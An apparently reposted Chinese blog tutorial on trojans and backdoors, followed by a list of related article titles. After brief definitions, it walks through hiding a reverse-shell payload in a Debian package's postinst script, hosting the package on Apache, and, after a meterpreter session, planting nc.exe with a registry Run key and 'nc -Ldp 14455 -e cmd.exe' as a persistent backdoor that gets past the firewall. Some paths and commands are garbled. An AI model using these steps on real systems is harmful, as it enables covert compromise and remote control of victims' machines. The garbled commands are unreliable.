01木马与后门

 

木马?后门?

木马和后门都有害,尤其是木马,它由攻击者主动发起,稍不留心就会被利用;后门原来是留给自己方便用的,但也有可能被非法利用,这两种程序都会给用户带来损失。

木马是指潜伏在电脑中,可受外部用户控制以窃取本机信息或者控制权的程序。也称木马病毒,是指通过特定的程序来控制另一台计算机。与蠕虫病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种主机的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至远程操控被种主机。

后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法。在软件的开发阶段,程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。但是,如果这些后门被其他人知道,或是在发布软件之前没有删除后门程序,那么它就成了安全风险,容易被黑客当成漏洞进行攻击。

后门与木马的相同之处在于,后门程序不一定有自我复制的动作,也就是后门程序不一定会“感染”其它电脑。

 

 

02木马的制作与利用

 

Linux木马制作

将恶意代码捆绑在安装包中,使得用户下载后一经安装立即收到shell,从而控制整个目标机。

deb包

deb包是debian,ubuntu等LINUX发行版的软件安装包,在Linux操作系统中类似于windows中的软件包(exe),不需要太复杂的编译即可通过鼠标点击安装使用。处理这些包的经典程序是dpkg。

dpkg制作deb包 

deb包里的结构:DEBIAN目录和软件具体安装目录(模拟安装目录)(如etc,usr,opt,tmp等)。

在DEBIAN目录中至少有control文件,还可能有postinst(postinstallation)、postrm(postremove)、preinst(preinstallation)、prerm(preremove)、copyright(版权)、changlog(修订记录)和conffiles等。

control文件:

描述软件包的名称(Package),版本(Version),描述(Description)等,是deb包必须具备的描述性文件,以便于软件的安装管理和索引。为了能将软件包进行充分的管理,可能还具有其它字段。

postinst文件:

包含了软件在进行正常目录文件拷贝到系统后,所需要执行的配置工作。

Deb包解压

创建contral和postinst文件

postinst文件内容(软件安装完后,执行该Shell脚本,一般用来配置软件执行环境,必须以“#!/bin/sh”为首行,然后给该脚本赋予可执行权限:chmod +x  postinst):

生成payload,我们将会创建一个反弹shell来反向连接到我们。

将其命名为“freesweep_scores"

chmod 755 postinst

dpkg-deb—build /tmp/work

mv work.deb freesweep.deb

cp freesweep.deb /var/www/html/

service apache2 start

攻击机监听反向连接端口

 

 

03后门的安装与防火墙绕过

 

拿到meterpreter后上传nc后门并加入启动项,nc连接后操作防火墙开启后门程序绑定的端口,不再受防火墙限制。

拿到meterpreter后从本地上传一个nc到windows机器

upload/usr/share/windows-binaries/nc.exe    c:llwindowsllsystem32

reg setval -k HKLMIsoftwarellmicrosoftllwindowsllcurrentversionllrun-V

nc  -d “C:\lwindows\lsystem32\nc.exe  -Ldp 14455  -e  cmd.exe"

 

 

 

 

重启靶机测试shutdown-r,检查端口,测试nc直连

 

 

转载于:https://www.cnblogs.com/lvwuwa/p/11129137.html

9.Metasploit制作木马后门相关推荐

  1. metasploit制作木马程序

    第七章第三小节,讲的是将木马绑定到putty.exe程序下.觉得蛮有趣,这里再重复下书上的步骤: 1)百度搜索,下载原版putty程序 2)在bt5下输入命令:msfpayload windows/m ...

  2. kali metasploit 制作后门程序远程操控基本使用方法

    kali metasploit制作后门程序远程操控基本使用方法 1.后门程序的制作与加密 后门的实质就是木马 msfvenom -p windows/x64/meterpreter/reverse_t ...

  3. inrul plus 90sec.php,DEDE木马后门专杀工具 针对 90sec.php 一类

    2013-08-05 2013年8月5日 网络尖刀 讯: 最近使用DEDE的站长最近肯定都被"90sec.php"一类的木马后门没少折腾,删了又出现,出现了再删,一直都没有办法根治 ...

  4. kali使用msf简单制作木马

    命令: 废话不多说,直接上命令: msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.10.166 lport=4444 ...

  5. 网络安全学习--014--木马及木马后门的讲解,webshell箱子溯源追踪

    提示:本文所讨论的技术仅用于研究学习,旨在提高大家信息安全意识,任何人不得将其用于非法目的. @木马及木马后门的讲解,webshell箱子溯源追踪 一:webshell制作原理 webshell:即w ...

  6. mysql数据库木马查杀_Linux系统木马后门查杀方法详解

    木马和后门的查杀是系统管理员一项长期需要坚持的工作,切不可掉以轻心.以下从几个方面在说明Linux系统环境安排配置防范和木马后门查杀的方法: 一.Web Server(以Nginx为例) 1.为防止跨 ...

  7. linux系统 网站木马后门Webshell查杀工具源码

    后门这东西好让人头疼,第一文件太多了,不容易找,第二,难找,需要特征匹配啊.搞了一个python版查杀php webshell后门工具,大家可以增加后门的特征码,然后甩到后台给他查杀就可以了.适合Li ...

  8. 信息安全实验五 之 计算机病毒与黑客实验脚本【恶意网页病毒演示病毒制作木马捆绑】

    信息安全实验五 之 计算机病毒与黑客实验脚本[恶意网页病毒演示&病毒制作&木马捆绑] 一.脚本及恶意网页病毒演示实验 1.创建文件 2.拷贝文件 3.删除文件 4.修改文件 二.病毒详 ...

  9. 网站木马后门查杀工具Linux系统专用

    后门这东西好让人头疼,第一文件太多了,不容易找,第二,难找,需要特征匹配啊.搞了一个python版查杀php webshell后门工具,大家可以增加后门的特征码,然后甩到后台给他查杀就可以了.适合Li ...

最新文章

  1. UIView及其分类的属性方法定义
  2. 二进制补码求值用c语言,C语言程序设计第2章数据类型.运算符与表达式.ppt
  3. XML与DataSet的相互转换
  4. C++:20---成员变量初始化方式
  5. 我说我精通字符串,面试官竟然问我Java中的String有没有长度限制!?|附视频讲解
  6. 小汤学编程之JAVA基础day01——JAVA基本概念、第一个JAVA程序
  7. 【Java】Base64编码与解码
  8. Python:闭包(简介、使用方法、nonlocal修改闭包内使用的外部变量)、装饰器(定义、作用、通用装饰器、多个装饰器、带参数的装饰器、类装饰器、装饰器方式添加WEB框架的路由)
  9. Matlab中冒号“:“的使用方法
  10. Linux下安装禅道
  11. BoundsChecker使用说明(代码调试)
  12. 从假装在腾讯,到真的360 —— 一个应届准PM的独白(面经干货)
  13. 解决电脑系统重装后出现多引导项的问题
  14. 模数转换芯片AD7705的使用心得
  15. 搞定Prometheus普罗米修斯监控系统
  16. OCR识别通过某瓣人机验证
  17. HTML5实现动态视频背景
  18. BIM技术在家装中有5大应用,您知道吗?
  19. jqury实现异步文件上传
  20. GitHub小技巧, 让你嗖嗖找到想要的

热门文章

  1. dwr找不到java类_DWR基本配置
  2. mpacc在职研究生报考条件-报考在职研究生一般都需要什么条件?
  3. Type-C蓝牙音箱单C口可充电可OTG方案
  4. msp430f5529标准库学习之mpu6050dmp库和卡尔曼滤波移植
  5. 计算机课的动画片,国产动画片大全
  6. Unity3D开发之发布webplayer设置全屏
  7. Unity学习之_编辑器扩展
  8. 表格上有两行表头时,最右侧始终固定的按钮水平对齐
  9. 1分钟教你自己动手装系统
  10. 实例详解如何实现来电拦截及拦截后的提示音